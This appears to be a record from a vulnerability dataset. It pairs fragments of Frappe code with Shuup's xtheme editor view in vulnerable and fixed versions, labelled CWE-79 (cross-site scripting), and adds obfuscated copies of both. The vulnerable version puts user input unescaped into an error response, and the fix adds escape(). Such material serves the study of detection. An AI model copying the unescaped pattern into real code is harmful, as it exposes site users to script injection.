def FUNC_66(self, VAR_38='Comment', VAR_39=None, VAR_40=None, VAR_41=None, VAR_42=None, VAR_43=None):
VAR_68 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_38,
"comment_email": VAR_40 or frappe.session.user,
"comment_by": VAR_43,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_39 or VAR_38,
"link_doctype": VAR_41,
"link_name": VAR_42
}).insert(VAR_11=True)
return VAR_68
def FUNC_67(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if self.meta.track_seen:
VAR_96 = self.get('_seen') or []
VAR_96 = frappe.parse_json(VAR_96)
if VAR_44 not in VAR_96:
_seen.append(VAR_44)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_96), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_77 = getattr(self, "_liked_by", None)
if VAR_77:
return json.loads(VAR_77)
else:
return []
def FUNC_71(self, VAR_45, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_45] = VAR_26
def FUNC_72(self, VAR_45=None):
if not VAR_45:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_45]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_46=None):
VAR_78 = self.get_signature()
if file_lock.lock_exists(VAR_78):
VAR_97 = True
if VAR_46:
for i in range(VAR_46):
time.sleep(1)
if not file_lock.lock_exists(VAR_78):
VAR_97 = False
break
if VAR_97:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_78)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_47, VAR_48):
if date_diff(self.get(VAR_48), self.get(VAR_47)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_48)),
frappe.bold(self.meta.get_label(VAR_47)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_79 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_80 = set([assignment.owner for assignment in VAR_79])
return VAR_80
def FUNC_78(self, VAR_49):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_49)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
VAR_34 = frappe.get_doc(VAR_2, VAR_3)
VAR_34.unlock()
try:
getattr(VAR_34, VAR_4)(**VAR_1)
except Exception:
frappe.db.rollback()
if frappe.local.message_log:
VAR_88 = json.loads(frappe.local.message_log[-1]).get('message')
else:
VAR_88 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
VAR_34.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_88)
VAR_34.notify_update()
| [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] | [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1155,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
# since layouts will most likely break with multiple cells per row, we are
# limiting the amount.
ROW_CELL_LIMIT = 4
class EditorView(TemplateView):
template_name = "shuup/xtheme/editor.jinja"
xtheme_injection = False # We don't need the editing injection here, so opt-out
changed = False # Overridden in `save_layout`
def _get_default_layout(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def get_context_data(self, **kwargs): # doccov: ignore
ctx = super(EditorView, self).get_context_data(**kwargs)
ctx["layout"] = self.layout
ctx["csrf_token_str"] = get_token(self.request)
# ctx["layout_debug"] = pformat(ctx["layout"].serialize())
ctx["current_cell_coords"] = self.current_cell_coords
ctx["current_cell"] = self.current_cell
ctx["form"] = self.form
ctx["changed"] = self.changed
ctx["cell_limit"] = ROW_CELL_LIMIT
return ctx
def dispatch(self, request, *args, **kwargs): # doccov: ignore
if not could_edit(request):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
# We saved the default layout, so get rid of the humongous GET arg and try again
get_args = dict(self.request.GET.items())
get_args.pop("default_config", None)
global_type = get_args.pop("global_type", None)
if global_type:
get_args["view"] = XTHEME_GLOBAL_VIEW_NAME
# We are overriding the view with XTHEME_GLOBAL_VIEW_NAME if this is a global placeholder
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(get_args)))
return super(EditorView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs): # doccov: ignore
command = request.POST.get("command")
if command:
dispatcher = getattr(self, "dispatch_%s" % command, None)
if not callable(dispatcher):
raise Problem(_("Unknown command: `%s`.") % command)
dispatch_kwargs = dict(request.POST.items())
rv = dispatcher(**dispatch_kwargs)
if rv:
return rv
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(EditorView, self).get(request, *args, **kwargs)
if request.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
# after we save the new layout configs, make sure to reload the saved data in forms
# so the returned get() response contains updated data
self.build_form()
if request.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(request, *args, **kwargs)
def _populate_vars(self):
theme = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not theme:
raise Problem(_("Unable to determine the current theme."))
view_name = self.request.GET["view"]
global_type = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
theme=theme,
shop=self.request.shop,
view_name=view_name,
draft=True,
global_type=global_type,
)
# Let's store the layout data key for save here
self.layout_data_key = self.request.GET.get("layout_data_key", None)
# Let's use the layout identifier passed by the view to
# fetch correct layout
layout_identifier = self.request.GET.get("layout_identifier", None)
layout_cls = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == layout_identifier:
layout_cls = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
layout_cls=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(x, y) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(x=x, y=y)
self.build_form()
def build_form(self):
if not self.current_cell:
self.form = None
return
kwargs = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
kwargs["data"] = self.request.POST
kwargs["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**kwargs)
def save_layout(self, layout=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, layout=(layout or self.layout))
self.changed = True
def dispatch_add_cell(self, y, **kwargs):
y = int(y)
if len(self.layout.rows[y].cells) >= ROW_CELL_LIMIT:
raise ValueError(_("Can't add more than %d cells in one row.") % ROW_CELL_LIMIT)
if not (0 <= y < len(self.layout.rows)):
# No need to raise an exception, really.
# It must have been a honest mistake.
return
self.layout.rows[y].add_cell()
self.save_layout()
def dispatch_add_row(self, y=None, **kwargs):
row = self.layout.insert_row(y)
row.add_cell() # For convenience, add a cell to the row.
self.save_layout()
def dispatch_del_row(self, y, **kwargs):
self.layout.delete_row(y)
self.save_layout()
def dispatch_move_row_to_index(self, from_y, to_y, **kwargs):
self.layout.move_row_to_index(from_y, to_y)
self.save_layout()
def dispatch_move_cell_to_position(self, from_x, from_y, to_x, to_y, **kwargs):
self.layout.move_cell_to_position(from_x, from_y, to_x, to_y)
self.save_layout()
def dispatch_del_cell(self, x, y, **kwargs):
self.layout.delete_cell(x, y)
self.save_layout()
def dispatch_change_plugin(self, plugin="", **kwargs):
if self.current_cell:
if not plugin:
plugin = None
self.current_cell.plugin_identifier = plugin
self.save_layout()
def dispatch_publish(self, **kwargs):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def dispatch_revert(self, **kwargs):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.html import escape
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
# since layouts will most likely break with multiple cells per row, we are
# limiting the amount.
ROW_CELL_LIMIT = 4
class EditorView(TemplateView):
template_name = "shuup/xtheme/editor.jinja"
xtheme_injection = False # We don't need the editing injection here, so opt-out
changed = False # Overridden in `save_layout`
def _get_default_layout(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def get_context_data(self, **kwargs): # doccov: ignore
ctx = super(EditorView, self).get_context_data(**kwargs)
ctx["layout"] = self.layout
ctx["csrf_token_str"] = get_token(self.request)
# ctx["layout_debug"] = pformat(ctx["layout"].serialize())
ctx["current_cell_coords"] = self.current_cell_coords
ctx["current_cell"] = self.current_cell
ctx["form"] = self.form
ctx["changed"] = self.changed
ctx["cell_limit"] = ROW_CELL_LIMIT
return ctx
def dispatch(self, request, *args, **kwargs): # doccov: ignore
if not could_edit(request):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
# We saved the default layout, so get rid of the humongous GET arg and try again
get_args = dict(self.request.GET.items())
get_args.pop("default_config", None)
global_type = get_args.pop("global_type", None)
if global_type:
get_args["view"] = XTHEME_GLOBAL_VIEW_NAME
# We are overriding the view with XTHEME_GLOBAL_VIEW_NAME if this is a global placeholder
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(get_args)))
return super(EditorView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs): # doccov: ignore
command = request.POST.get("command")
if command:
dispatcher = getattr(self, "dispatch_%s" % command, None)
if not callable(dispatcher):
raise Problem(_("Unknown command: `%s`.") % escape(command))
dispatch_kwargs = dict(request.POST.items())
rv = dispatcher(**dispatch_kwargs)
if rv:
return rv
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(EditorView, self).get(request, *args, **kwargs)
if request.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
# after we save the new layout configs, make sure to reload the saved data in forms
# so the returned get() response contains updated data
self.build_form()
if request.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(request, *args, **kwargs)
def _populate_vars(self):
theme = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not theme:
raise Problem(_("Unable to determine the current theme."))
view_name = self.request.GET["view"]
global_type = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
theme=theme,
shop=self.request.shop,
view_name=view_name,
draft=True,
global_type=global_type,
)
# Let's store the layout data key for save here
self.layout_data_key = self.request.GET.get("layout_data_key", None)
# Let's use the layout identifier passed by the view to
# fetch correct layout
layout_identifier = self.request.GET.get("layout_identifier", None)
layout_cls = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == layout_identifier:
layout_cls = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
layout_cls=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(x, y) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(x=x, y=y)
self.build_form()
def build_form(self):
if not self.current_cell:
self.form = None
return
kwargs = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
kwargs["data"] = self.request.POST
kwargs["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**kwargs)
def save_layout(self, layout=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, layout=(layout or self.layout))
self.changed = True
def dispatch_add_cell(self, y, **kwargs):
y = int(y)
if len(self.layout.rows[y].cells) >= ROW_CELL_LIMIT:
raise ValueError(_("Can't add more than %d cells in one row.") % ROW_CELL_LIMIT)
if not (0 <= y < len(self.layout.rows)):
# No need to raise an exception, really.
# It must have been a honest mistake.
return
self.layout.rows[y].add_cell()
self.save_layout()
def dispatch_add_row(self, y=None, **kwargs):
row = self.layout.insert_row(y)
row.add_cell() # For convenience, add a cell to the row.
self.save_layout()
def dispatch_del_row(self, y, **kwargs):
self.layout.delete_row(y)
self.save_layout()
def dispatch_move_row_to_index(self, from_y, to_y, **kwargs):
self.layout.move_row_to_index(from_y, to_y)
self.save_layout()
def dispatch_move_cell_to_position(self, from_x, from_y, to_x, to_y, **kwargs):
self.layout.move_cell_to_position(from_x, from_y, to_x, to_y)
self.save_layout()
def dispatch_del_cell(self, x, y, **kwargs):
self.layout.delete_cell(x, y)
self.save_layout()
def dispatch_change_plugin(self, plugin="", **kwargs):
if self.current_cell:
if not plugin:
plugin = None
self.current_cell.plugin_identifier = plugin
self.save_layout()
def dispatch_publish(self, **kwargs):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def dispatch_revert(self, **kwargs):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| xss | {
"code": [
" raise Problem(_(\"Unknown command: `%s`.\") % command)"
],
"line_no": [
73
]
} | {
"code": [
"from django.utils.html import escape",
" raise Problem(_(\"Unknown command: `%s`.\") % escape(command))"
],
"line_no": [
11,
74
]
} |
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
VAR_0 = 4
class CLASS_0(TemplateView):
VAR_1 = "shuup/xtheme/editor.jinja"
VAR_2 = False # We don't need the editing injection here, so opt-out
VAR_3 = False # Overridden in `FUNC_6`
def FUNC_0(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def FUNC_1(self, **VAR_4): # doccov: ignore
VAR_15 = super(CLASS_0, self).get_context_data(**VAR_4)
VAR_15["layout"] = self.layout
VAR_15["csrf_token_str"] = get_token(self.request)
VAR_15["current_cell_coords"] = self.current_cell_coords
VAR_15["current_cell"] = self.current_cell
VAR_15["form"] = self.form
VAR_15["changed"] = self.changed
VAR_15["cell_limit"] = VAR_0
return VAR_15
def FUNC_2(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
if not could_edit(VAR_5):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
VAR_23 = dict(self.request.GET.items())
VAR_23.pop("default_config", None)
VAR_19 = VAR_23.pop("global_type", None)
if VAR_19:
VAR_23["view"] = XTHEME_GLOBAL_VIEW_NAME
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(VAR_23)))
return super(CLASS_0, self).dispatch(VAR_5, *VAR_6, **VAR_4)
def FUNC_3(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
VAR_16 = VAR_5.POST.get("command")
if VAR_16:
VAR_24 = getattr(self, "dispatch_%s" % VAR_16, None)
if not callable(VAR_24):
raise Problem(_("Unknown VAR_16: `%s`.") % VAR_16)
VAR_25 = dict(VAR_5.POST.items())
VAR_26 = VAR_24(**VAR_25)
if VAR_26:
return VAR_26
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(CLASS_0, self).get(VAR_5, *VAR_6, **VAR_4)
if VAR_5.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
self.build_form()
if VAR_5.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(VAR_5, *VAR_6, **VAR_4)
def FUNC_4(self):
VAR_17 = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not VAR_17:
raise Problem(_("Unable to determine the current VAR_17."))
VAR_18 = self.request.GET["view"]
VAR_19 = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
VAR_17=theme,
shop=self.request.shop,
VAR_18=view_name,
draft=True,
VAR_19=global_type,
)
self.layout_data_key = self.request.GET.get("layout_data_key", None)
VAR_20 = self.request.GET.get("layout_identifier", None)
VAR_21 = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == VAR_20:
VAR_21 = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
VAR_21=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(VAR_13, VAR_8) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(VAR_13=x, VAR_8=y)
self.build_form()
def FUNC_5(self):
if not self.current_cell:
self.form = None
return
VAR_4 = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
VAR_4["data"] = self.request.POST
VAR_4["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**VAR_4)
def FUNC_6(self, VAR_7=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, VAR_7=(layout or self.layout))
self.changed = True
def FUNC_7(self, VAR_8, **VAR_4):
VAR_8 = int(VAR_8)
if len(self.layout.rows[VAR_8].cells) >= VAR_0:
raise ValueError(_("Can't add more than %d cells in one VAR_22.") % VAR_0)
if not (0 <= VAR_8 < len(self.layout.rows)):
return
self.layout.rows[VAR_8].add_cell()
self.save_layout()
def FUNC_8(self, VAR_8=None, **VAR_4):
VAR_22 = self.layout.insert_row(VAR_8)
VAR_22.add_cell() # For convenience, add a cell to the VAR_22.
self.save_layout()
def FUNC_9(self, VAR_8, **VAR_4):
self.layout.delete_row(VAR_8)
self.save_layout()
def FUNC_10(self, VAR_9, VAR_10, **VAR_4):
self.layout.move_row_to_index(VAR_9, VAR_10)
self.save_layout()
def FUNC_11(self, VAR_11, VAR_9, VAR_12, VAR_10, **VAR_4):
self.layout.move_cell_to_position(VAR_11, VAR_9, VAR_12, VAR_10)
self.save_layout()
def FUNC_12(self, VAR_13, VAR_8, **VAR_4):
self.layout.delete_cell(VAR_13, VAR_8)
self.save_layout()
def FUNC_13(self, VAR_14="", **VAR_4):
if self.current_cell:
if not VAR_14:
plugin = None
self.current_cell.plugin_identifier = VAR_14
self.save_layout()
def FUNC_14(self, **VAR_4):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def FUNC_15(self, **VAR_4):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
|
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.html import escape
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
VAR_0 = 4
class CLASS_0(TemplateView):
VAR_1 = "shuup/xtheme/editor.jinja"
VAR_2 = False # We don't need the editing injection here, so opt-out
VAR_3 = False # Overridden in `FUNC_6`
def FUNC_0(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def FUNC_1(self, **VAR_4): # doccov: ignore
VAR_15 = super(CLASS_0, self).get_context_data(**VAR_4)
VAR_15["layout"] = self.layout
VAR_15["csrf_token_str"] = get_token(self.request)
VAR_15["current_cell_coords"] = self.current_cell_coords
VAR_15["current_cell"] = self.current_cell
VAR_15["form"] = self.form
VAR_15["changed"] = self.changed
VAR_15["cell_limit"] = VAR_0
return VAR_15
def FUNC_2(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
if not could_edit(VAR_5):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
VAR_23 = dict(self.request.GET.items())
VAR_23.pop("default_config", None)
VAR_19 = VAR_23.pop("global_type", None)
if VAR_19:
VAR_23["view"] = XTHEME_GLOBAL_VIEW_NAME
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(VAR_23)))
return super(CLASS_0, self).dispatch(VAR_5, *VAR_6, **VAR_4)
def FUNC_3(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
VAR_16 = VAR_5.POST.get("command")
if VAR_16:
VAR_24 = getattr(self, "dispatch_%s" % VAR_16, None)
if not callable(VAR_24):
raise Problem(_("Unknown VAR_16: `%s`.") % escape(VAR_16))
VAR_25 = dict(VAR_5.POST.items())
VAR_26 = VAR_24(**VAR_25)
if VAR_26:
return VAR_26
self.request.method = "GET" # At this point, we won't want to cause form validation
